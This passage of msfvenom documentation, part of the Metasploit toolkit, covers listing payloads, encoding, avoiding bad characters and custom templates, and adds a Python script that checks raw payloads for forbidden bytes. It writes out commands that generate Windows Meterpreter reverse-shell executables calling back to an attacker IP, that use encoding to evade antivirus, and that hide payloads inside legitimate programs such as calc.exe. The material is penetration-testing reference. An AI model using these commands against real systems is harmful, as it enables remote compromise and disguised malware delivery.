To see what payloads are available from the Framework, you can do:
./msfvenom -l payloads
Typically, this is how you will use msfvenom:
$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe
How to use msfvenom to encode a payload
By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
To find out what encoders you can use, you can use the -l flag:
./msfvenom -l encoders
You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help with avoiding antivirus, but know that encoding isn't really meant to be used as a real AV evasion solution:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3
How to avoid bad characters
The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:
./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw
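The -b flag tells msfvenom which bytes must not appear in the output, but it is worth confirming the result independently before relying on it. The following script is an added example and is not part of the Metasploit documentation or the msfvenom tool: it parses a badchar string in the same '\x00\x0a' notation the -b flag takes (accepting literal characters as well is this script's own choice, not a documented msfvenom behaviour) and reports every offset in a raw payload file where a forbidden byte still occurs.

```python
#!/usr/bin/env python3
"""Check a raw payload blob against a set of forbidden bytes.

Added example, not part of the Metasploit project. It reproduces the
bad-character constraint that `msfvenom -b` is supposed to enforce so the
output can be verified independently.
"""
import re
import sys
from typing import Dict, List

# Matches one escaped byte such as \x00 or \x0A.
_ESCAPED_BYTE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_badchars(spec: str) -> bytes:
    """Parse a badchar string like '\\x00\\x0a\\x0d' into distinct bytes.

    Escaped bytes are decoded; any other character is taken literally
    (this script's own convention, assumed rather than taken from msfvenom).
    """
    found = set()
    pos = 0
    while pos < len(spec):
        m = _ESCAPED_BYTE.match(spec, pos)
        if m:
            found.add(int(m.group(1), 16))
            pos = m.end()
        else:
            found.add(ord(spec[pos]) & 0xFF)
            pos += 1
    return bytes(sorted(found))


def find_badchars(payload: bytes, badchars: bytes) -> Dict[int, List[int]]:
    """Return {forbidden_byte: [offsets...]} for every occurrence found."""
    hits: Dict[int, List[int]] = {}
    for offset, value in enumerate(payload):
        if value in badchars:
            hits.setdefault(value, []).append(offset)
    return hits


def payload_is_clean(payload: bytes, spec: str) -> bool:
    """True when none of the bytes named in `spec` occur in `payload`."""
    return not find_badchars(payload, parse_badchars(spec))


def report(payload: bytes, spec: str) -> str:
    """Human-readable summary of the check, one line per forbidden byte."""
    hits = find_badchars(payload, parse_badchars(spec))
    if not hits:
        return "clean: no forbidden bytes in %d bytes" % len(payload)
    lines = []
    for value, offsets in sorted(hits.items()):
        lines.append("byte 0x%02x at offsets %s" % (value, offsets))
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: badchar_check.py payload.bin '\x00\x0a'
    # (the payload file is whatever `msfvenom ... -f raw` wrote to disk)
    if len(sys.argv) != 3:
        sys.exit("usage: %s payload.bin '\\x00\\x0a'" % sys.argv[0])
    with open(sys.argv[1], "rb") as fh:
        data = fh.read()
    print(report(data, sys.argv[2]))
    sys.exit(0 if payload_is_clean(data, sys.argv[2]) else 1)
```

Run it against the file produced by a `-f raw` invocation and the same badchar string you passed to -b; a non-zero exit means the encoder did not honour the constraint and the output should not be used as-is.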
How to supply a custom template using msfvenom
By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following:
./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe
Please note: If you'd like to create an x64 payload with a custom x64 template for Windows, then instead of the exe format, you should use exe-only:
./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe
The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this is currently only reliable for older Windows machines such as x86 Windows XP.
How to chain msfvenom output
The old msfpayload and msfencode utilities were often chained together in order to layer on multiple encodings. This is possible using msfvenom as well:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
./msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | \
./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe
msfvenom is a promising addition to the Metasploit Framework.